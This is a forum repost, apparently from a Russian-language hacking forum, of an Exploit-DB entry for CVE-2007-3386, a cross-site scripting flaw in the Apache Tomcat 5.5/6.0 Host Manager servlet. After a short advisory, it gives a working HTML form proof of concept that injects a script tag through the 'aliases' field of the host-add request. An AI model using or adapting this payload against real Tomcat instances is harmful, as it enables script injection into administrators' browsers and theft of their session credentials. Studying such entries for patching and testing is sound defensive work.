Exploit Apache Tomcat 6.0.13 - Host Manager Servlet Cross-Site Scripting

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
30495
Проверка EDB
  1. Пройдено
Автор
NTT OSS CENTER
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2007-3386
Дата публикации
2007-08-14
HTML:
source: https://www.securityfocus.com/bid/25314/info

Apache Tomcat Host Manager Servlet is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to inject HTML and script code into the browser of an unsuspecting victim. The attacker may then steal cookie-based authentication credentials and launch other attacks.

Apache Tomcat 5.5.0 through 5.5.24 and 6.0.0 through 6.0.13 are affected. 

<form action="http://localhost:8080/host-manager/html/add" method="get"> <input type="hidden" NAME='name' VALUE="aaa"> <input type="hidden" NAME='aliases' VALUE="<script>alert()</script>"> <input type="submit"> </form>
 
Источник
www.exploit-db.com

Похожие темы